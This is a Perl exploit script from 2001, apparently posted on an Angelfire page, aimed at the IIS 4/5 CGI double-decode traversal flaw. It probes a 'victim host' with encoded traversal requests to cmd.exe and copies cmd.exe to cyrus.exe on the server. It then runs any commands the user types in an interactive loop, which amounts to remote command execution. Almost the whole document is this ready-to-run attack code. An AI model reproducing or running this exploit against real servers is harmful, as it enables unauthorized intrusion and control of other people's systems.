Untitled Document

Site hosted by Angelfire.com: Build your free website today!

#!/usr/bin/perl
# Written by Cyrus The Gerat , CyrusArmy@Bigfoot.com , May 15th 2001
# This perl script lets you to test the vulnerable servers to IIS4/5 CGI decode hole,
# Also you can exploit the hole and execute your commands remotely!
# Vulnerability found by NSfocus security team,
# Tested for compatibility on UNIX/WINDOWS (activestate perl)
# Works well on windows and unix platforms,

$ARGC=@ARGV;
if ($ARGC <3) {
print "\n\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
print "\n Usage:\n\n $0 <victim host> <victim port> <command line to execute>\n\n";
print " Victim Host: Address of IIS4/5 server vulnerable to decode hole! \n";
print " Victim port: HTTP/HTTPS port 80 or 443\n";
print " Command to Execute: for example \"echo Just hacked! > hacked.txt\" \n\n";
exit;
}
use Socket;

my
($host,$port,$target,$notvulnerable,$notfound,$notcopied,$accessdenied);
$host=$ARGV[0];
$port=$ARGV[1];
$target=inet_aton($host);
$notvulnerable=1;
$notfound=1;
$accessdenied=0;

print "\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
print "Connecting to server $host port $port..., \n\n";
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver HTTP/1.0\r\n\r\n");

for ($i=0; $i <=7 ;$i++ ) {
print $results[$i];
}

foreach $line (@results){
if ($line =~ /\[Version/) {
$notvulnerable=0;
print "\nWow! system is vulnerable.\n";
print $line;
}
}

if ($notvulnerable) {
print "\nOops! System is not vulnerable. \n";
exit(1);
}

# you can exchange Wow! and Oops! as you prefer! ;-)

print "\nChecking for command interpreter...\n";
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20cyrus%2eexe HTTP/1.0\r\n\r\n");
#print @results;

foreach $line (@results){
if ($line =~ /cyrus.exe/) {$notfound=0;}
}

if ($notfound) {
print "Command interpreter not found, Trying to copy cmd.exe \n";
@results=sendraw("GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd%2eexe+cyrus%2eexe
HTTP/1.0\r\n\r\n");
#print @results;
}

foreach $line (@results){
if (($line =~ /denied/ )) {$accessdenied=1;}
}

if ($accessdenied) {
print"Cannot copy command interpreter, Try manually! \n\n";
exit(2);
} else {
print "Command interpreter OK \n";
}

$command=@ARGV[2];
print "Now executing your command: $command \n\n";
#$command=~s/ /\%20/g;
$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
#print $command;
my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

print STDOUT "\n\nMore commands? , or EOF to end:\n";
while ($command = <STDIN>) {
print "You said: $command \n";
chop $command;
$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg; my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
print "\n\nTell me more, or EOF (^D/^Z) to end:\n";
}
print "\nThat's all! Another IIS hole just similified by cyrus!\n";

sub sendraw {
my ($pstr)=@_;

socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else {
print "Cannot connect to $host port $port\n";
exit(3); }
}